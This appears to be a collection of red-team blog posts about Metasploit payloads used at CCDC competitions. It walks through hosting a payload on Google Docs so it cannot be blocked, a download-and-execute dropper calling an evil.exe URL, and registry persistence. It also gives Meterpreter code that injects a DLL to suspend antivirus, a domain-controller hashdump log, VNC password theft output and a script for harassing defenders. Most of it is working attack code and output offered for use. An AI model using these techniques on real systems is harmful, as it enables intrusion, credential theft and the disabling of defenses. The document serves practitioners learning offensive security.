In Part 1 I gave an example I used at CCDC with the single ‘windows/download_exec’. One of the down sides of that payload is you need to host the binary, giving up an IP/host that can be blocked. Well, Google recently (a couple months ago) allowed people to upload ‘anything’ to Google docs. And you can then share these files publicly. Probably already see where I’m going with this, but here are some steps to get it going, first upload your malicious binary (not the dropper ‘windows/download_exec’, but the file it needs to execute). I assume you don’t need a picture to find the upload button ;–)

Next, go to Action –> Share –> Share and make it public:

You’ll get a link that says docs.google.com / leaf?id= something:

Go to that link and copy the link that says ‘Download’

You should have something like this:

https://docs.google.com/uc?id=XXXXXXXX&export=download&hl=en_US

Remove everything after the & and change https to http (download_exec can’t talk SSL) so you have something that looks like:

http://docs.google.com/uc?id=XXXXXXXX

Now use that link in the URL option when you generate your ‘windows/download_exec’ binary and you should be good to go. You can still change your binary on the fly by right clicking the file in your Google Docs list and selecting “Add or manage revisions”. Plus you get the added bonus of being virtually unblockable.

One thing to be careful of is the download a ‘leaf’ link are still live if you put the files in the ‘trash’ on Google Docs, you need to empty the trash for them to be completely offline.

Incident Responders, if you find something making these requests, switch the UC portion of the download back to ‘leaf’ and you can find out when it was uploaded, and have the ability to “Report Abusive Content” which if that account continues to do ‘bad stuff’ it will get looked into by Google.

Payload selection is something that rarely gets talked about in detail. Most PoCs just use calc.exe, netcat, or some kind of socket. The vast majority of Metasploit tutorials, videos and documentation use the windows/meterpreter/reverse_tcp payload which is only one of 224 possible payloads. Here is a little disclaimer: While the payloads in Metasploit don’t get updated as much as other parts of Metasploit, this is a point in time documentation of them (June 23, 2011) and the payloads available in Metasploit are constantly changing. I challenge you to continue to do a ‘show payloads’ and see what’s new.

If you issue ‘show payloads’ at the base of Metasploit’s console (msf>), it will show you every payload that Metasploit has available. However, exploit module writers can help the user out a bit with their selection by putting special limiters inside of their module. These limiters can be as specific as pointing out a specific payload, or as broad as specifying that it will only work with a ‘windows’ payload. For a decent example of this in action check out the JBoss ‘bshdeployer’ exploit module (modules/exploits/multi/http/jboss_bshdeployer.rb).

The payloads Metasploit has are broken down into ‘staged’, ‘stagers’, and ‘singles (also known as Inline)’. The difference between ‘staged’ and ‘stagers’ is pretty simple, ‘staged’ payloads use tiny ‘stagers’ to be able to fit into small exploitation spaces. During exploitation the exploit developer often has a very limited amount of memory they can manipulate through the programs inputs that they are exploiting. The stagers go in this space and their only job is to pull down the rest of the ‘staged’ payload. The downside to these types of payloads is they require a connection to something that will shovel them the rest of the payload. Inline payloads or ‘singles’ don’t have this problem. They are self contained and do what they are designed to do without any assistance.

All of the payloads in Metasploit use the one, the only, Multi Handler. I call it that because of how I call it:

1

msf> use multi/handler

It is a fitting title though as it is equipped to handle every single payload inside of Metasploit no matter what the architecture or type of connection being made. It knows how to deal with each type of payload because you tell it what to expect, but that doesn’t take away from the fact that in this single utility lies the crucial stepping stone for all of Metasploit’s exploitation.

The structure of most payloads tell you exactly what they do, but not always. If it says in the description that it’s ‘Inline’ that means it is a single, if it says ‘Stager’ that means it’s staged. Lets break a few down of the lesser known ones:

• cmd/windows/adduser – This is a single that executes ‘net user /add’ with the username and password you specify. This one doesn’t say that it’s ‘Inline’ but all of the ‘cmd/’ or ‘/exec’ payloads are singles.
• osx/armle/vibrate – A single that when executed on an iPhone, it vibrates.
• generic/debug_trap – Trips a debugger if it’s attached to the process (sends a single xCC ‘break’ byte)

One thing that isn’t immediately obvious is another marker of staged vs. singles:

1
2

osx/ppc/shell/reverse_tcp
osx/ppc/shell_reverse_tcp

The difference between these two payloads isn’t obvious other than the fact that one has an underscore ‘_’ instead of a forward slash ‘/’. The one with the underscore means it’s a single while the other is staged. But the architecture of the naming convention is a bit complicated. Most stick to OS/ARCHITECTURE/TYPE/PAYLOAD where a slash instead of an underscore between TYPE and PAYLOAD would signify the difference we just talked about. But not all payloads stick to this format. You can even go crazy and actually look in the directory: msfdirectory/modules/payloads/ – everything in the singles directory.. hmmm yup, is a single.

Singles are great for fire and forget, I’ve used as payloads for USB sticks (so the machine didn’t have to have a connection to do what I needed) all the way to a pretty sneaky persistence method. One that I used quite often at CCDC was with the payload: ‘windows/download_exec’. The only option this single has is ‘URL’. We would put something like http://www.redteam.com/evil.exe and generate the binary:

(Yes you can use msfpayload, or msfvenom on the command line to generate payloads, but I like to stay inside of msfconsole)

Then set that to auto start when someone logs in with something like:

1

meterpreter > reg setval -k "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -v "WindowsUpdate" -d "C:\Windows\dropper.exe"

Now all we had to do is wait for logins. If they happened to find our evil.exe binary (which download_exec makes it ‘a.exe’ and puts it in System32), and blocked our IP, all we had to do in replace evil.exe on our web server and wait for it to download the new one. A crude form of persistence, but it worked well.

I’m going to end this with a list of all the payloads… hopefully for all you tab completion lazy bums this might be the first time you’ve actually have taken a second to look around. In the next post I’ll be going into Meterpreter, the BEST payload in my humble-totally-unbiased opinion ;), with a bit of pivoting thrown in for good measure.

Just a follow up to my previous post. One of the things that sets that method apart is the fact that the suspension (once the DLL injection occurs) comes from within the process, and it suspends all the child processes as well.

Another way you can do this without the injection is just sending a suspend to all the threads in the process.

1
2
3
4
5

pid = 2980
targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
targetprocess.thread.each_thread do |x|
  targetprocess.thread.open(x).suspend
end

We open the process just like we did before, and make a very simple ‘each_thread’ loop. There are a few AVs engines that detected this as tampering. But if you target isn’t AV… Say it’s Process Explorer during CCDC, this might just confuse them enough to buy you some time to do other things without their watchful eye on you.

The other cool thing that happened when I did this was Process Explorer didn’t detect the process as suspended. If you looked under the thread list they were all suspended but not the process itself according to Process Explorer.

Not rocket science at all, but that’s because it’s built into the framework. Just another thing that metasploit makes dead simple.

Recently Didier Stevens wrote ‘Suspender.dll’ which is a DLL that will suspend a process and all of it’s child processes after a delay. 60 seconds is it’s default but you can rename the DLL to add a number (as such ‘Suspender10.dll’ for 10 seconds) to make the delay whatever you wish. You can find the blog post and download here: http://blog.didierstevens.com/2011/04/27/suspender-dll/

Jonathan Cran and I had the same idea, as I’m sure many others did as well. This might work against AntiVirus setups that protect themselves from being killed or their services stopped.

I still stand by my original claim that just removing it is easier (Blog Post: Silently Uninstall SEP). However that might be something the user notices (A little shield disappearing).

Well, I didn’t know how to do this with meterpreter so a bit of google fu landed me on: http://www.codeproject.com/KB/threads/winspy.aspx which has 3 different ways to attack the 2nd of which used a DLL (score!)

Using IRB within a meterpreter shell I started using Railgun (because once you know something sometimes its easy not too look for other solutions)

I start off setting up some variables after I’ve uploaded Suspender.dll:

1
2
3

pid = 1436
sizeofsuspend = 52376
pathtosuspend = "C:\Docume~1\Administrator\Desktop\Suspender10.dll"

Next up we need to open a handle on the target process:

1

handle = client.railgun.kernel32.OpenProcess(PROCESS_ALL_ACCESS,false,pid)["return"]

With the handle we allocate some memory in the remote process for our DLL to live in:

1

allocatedmem = client.railgun.kernel32.VirtualAllocEx(handle,nil,sizeofsuspend,MEM_COMMIT,PAGE_READWRITE)["return"]

Writing that DLL to memory isn’t much harder: (this and the previous step is the wrong way to do things as we’ll see later)

1

client.railgun.kernel32.WriteProcessMemory(handle,allocatedmem,pathtosuspend,sizeofsuspend,nil)

Here is the hard part. We have to somehow figure out the address LoadLibraryA in the remote processes memory space, accounting for ASLR then pass it the location in memory where our DLL is hiding. Yah, I couldn’t figure this one out, here is the best I did:

1

client.railgun.kernel32.CreateRemoteThread(handle,nil,0,allocatedmem,pathtosuspend,0,nil)

Then I got a friendly reminder by HD that most of this was built into meterpreter already so all that railgun nastness boils down to someting a lot simpler. Set the variables again:

1
2

pid = 1436
pathtosuspend = "C:\Docume~1\Administrator\Desktop\Suspender10.dll"

But this time we are going to use the loadlibrary payload that just got added to Metasploit Framework in r12765. We generate the payload with it pointing at our Suspender DLL:

1
2
3
4

pay = client.framework.payloads.create("windows/loadlibrary")
pay.datastore['DLL'] = pathtosuspend
pay.datastore['EXITFUNC'] = 'thread'
raw = pay.generate

Open the process, this time with Rex:

1

targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

Allocate the memory in the remote process write the payload (not our DLL) into that space:

1
2

mem = targetprocess.memory.allocate(raw.length + (raw.length % 1024))
targetprocess.memory.write(mem, raw)

And finally create the remote thread.. MUCH easier (The power of Rex even over Railgun)

1

targetprocess.thread.create(mem, 0)

And 10 seconds later our AV and all it’s children processes stop. Suspended by Didier’s Suspender.DLL. Thanks to HD for the slap in the head that I was doing things the wrong way and the 1 AM update to the framework that made this possible.

When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the “The parameter is incorrect” error in meterpreter. So I’ve had to fall back on dropping binaries which I really don’t like doing because of the added clean up and chance of getting ‘caught’. Well, with a bit of migration you’ll be back to passing the hash. Here is how, with a bit of the thought process first:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93

            ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                  ##


   =[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
   =[ svn r12622 updated today (2011.05.15)

msf > 
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011

msf > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
System Language : en_US
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer        : DOMAINCONTROLLE
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32

meterpreter > ps

Process list
============

 PID   Name                                       Arch  Session  User                          Path
 ---   ----                                       ----  -------  ----                          ----
 0     [System Process]                                                                        
 4     System                                     x64   0                                      
 224   smss.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 324   csrss.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 364   csrss.exe                                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 372   wininit.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 404   winlogon.exe                               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 468   services.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 476   lsass.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 484   lsm.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 628   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 708   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 804   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 836   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 880   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 932   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 972   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 328   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1172  spoolsv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1204  Microsoft.ActiveDirectory.WebServices.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
 1252  dfsrs.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfsrs.exe
 1288  dns.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
 1316  ismserv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\ismserv.exe
 1360  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1392  vmtoolsd.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1464  wlms.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wlmswlms.exe
 1492  dfssvc.exe                                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfssvc.exe
 1572  VMUpgradeHelper.exe                        x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 1896  TPAutoConnSvc.exe                          x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 2016  vds.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 872   sppsvc.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 1268  WmiPrvSE.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbemWmiPrvSE.exe
 2360  taskhost.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\System32\taskhost.exe
 2424  dwm.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\dwm.exe
 2452  explorer.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\explorer.exe
 2504  TPAutoConnect.exe                          x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 2512  conhost.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\conhost.exe
 2632  VMwareTray.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 2640  VMwareUser.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 2716  mmc.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\mmc.exe
 3052  mscorsvw.exe                               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Frameworkv4.0.30319\mscorsvw.exe
 2216  TrustedInstaller.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 1932  mscorsvw.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft\.NET\Framework\64\v4.0.30319\mscorsvw.exe
 2564  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1732  msdtc.exe                                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 2992  notepad.exe                                x86   1        SITTINGDUCK\juser             C:\Windows\SysWOW64\notepad.exe
 1720  notepad.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\notepad.exe


meterpreter > getpid
Current pid: 2992

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Ah, the wonderful ‘The parameter is incorrect’ error. Ok we are an admin since we can see the user for SYSTEM processes, so that isn’t the issue, but lets do a ‘getprivs’ just in case:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

meterpreter > getprivs    
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeIncreaseQuotaPrivilege
  SeMachineAccountPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemProfilePrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeRemoteShutdownPrivilege
  SeUndockPrivilege
  SeEnableDelegationPrivilege
  SeManageVolumePrivilege

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Boo.. Ok, so maybe we have to be ‘SYSTEM’…

1
2
3
4
5

meterpreter > getsystem
...got system (via technique 1).

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Still nothing… Maybe it requires that we be in a 64 bit process… PID 1720 was 64 bit version of Notepad, lets try that…

1
2
3
4
5
6

meterpreter > migrate 1720
[*] Migrating to 1720...
[*] Migration completed successfully.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Damn, what about as ‘SYSTEM’…

1
2
3

meterpreter > getsystem ...got system (via technique 1).  
meterpreter > hashdump 
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

No joy.. hmmm What about a ‘SYSTEM’ process that was already there.. ‘dns.exe’ PID 1288 should be good…

1
2
3
4
5
6
7
8
9
10
11
12
13
14

meterpreter > migrate 1288
[*] Migrating to 1288...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:MYLMHASH:MYNTLMHASH:::
Guest:501:MYLMHASH:MYNTLMHASH:::
krbtgtG:502:MYLMHASH:MYNTLMHASH:::
Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::
juserN:1104:MYLMHASH:MYNTLMHASH:::
jane.user??:1105:MYLMHASH:MYNTLMHASH:::
DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::

meterpreter > 

w00t. So I don’t know why, but it seems that you have to be in a ‘SYSTEM’ process who’s primary token (started by SYSTEM) is SYSTEM (since ‘getsystem’ wasn’t working). I also tried this getting SYSTEM to run a 32 bit process, and was still unable to dump hashes. So next time you’re on an Win2k8 R2 64 bit box, remember to migrate into a pre-existing 64bit SYSTEM process and you should be good to go.

Update on 2011-05-15 23:39 by Rob Fuller

As Gavin points out in the comments, it is better to run the meterpreter script or post module to do hashdumping on systems. The only time this is not the case is when you are trying to get domain hashes on a domain controller. The registry does not store these hashes (as far as I know). So LSASS injection is the only route and you have to jump through the mentioned hoops.

Original Post: http://blog.nvisiumsecurity.com/2011/04/exploitable-mobile-app-challenge-now.html

You can read the details on the above link, but it boils down to you make an application for iPhone or Android. You make it vulnerable to X,Y,Z types of flaws, you win a 32gb iPad or a Motorola Xoom.

Added bonus, all the apps get submitted to OWASP for people to learn Mobile security.

This is probably the most practical and applicable IPv6 talk I’ve ever seen. Amazing job.

Rick Hayes – Assessing and Pen-Testing IPv6 Networks from Adrian Crenshaw on Vimeo.

I felt left out…

That is all..

Chris Gates wrote a blog post about the ‘getvncpw’ meterpreter script. I ran into the same issue on Penetration Tests in the past but didn’t know much about the wacked out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack I wanted to find another way, but didn’t get a chance to.

Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: “Thats definitely within my coding ability to contribute a patch for”. After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday. It went far and beyond just adding in a bit of code to support UltraVNC.

changelog:

• Complete rewrite as a post module instead of a meterpreter script
• Passwords of less than 8 characters are correctly padded (thanks jduck)
• UltraVNC checks added
• TightVNC checks added for both VNC and it’s control console
• Made it very simple to add new checks in either the registry or in a file
• Output is a bit more verbose (lets you know something is happening
• Reports authentication credentials found to database
• Identifies the port that VNC is running on as well

It isn’t in the metasploit trunk so until/if if gets added you can get it here:

enum_vnc_pw.rb

If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.

Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways) :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINEAdministrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw 
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed

msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw 

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter > 

One of the best ways to throw blue teamers off the scent of another host getting owned, which also has the added effect of stressing them out is a batch script that runs through some of the more annoying features in nircmd.exe in succession and at regular intervals:

http://www.nirsoft.net/utils/nircmd.html

• setdisplay 640x480
• killprocess taskmgr.exe
• killprocess procexp.exe
• win -style title “my computer” 0x00c00000
• win child title “my computer” +exstyle all 0x00400000
• win +exstyle title “my computer” 0x00400000
• win trans ititle “internet explorer” 256
• win close class “CabinetWClass”
• multiremote copy “c:tempcomputers.txt” exitwin poweroff force
• exitwin logoff
• standby
• monitor off
• win child class “Shell_TrayWnd” hide class “button”
• win hide class progman

Just to name a few…

another fun batch script to have running is ‘echo knock knock | clip’ in an endless and delayless loop. (I makes ‘knock knock’ the only thing that will ever be pasted ;–)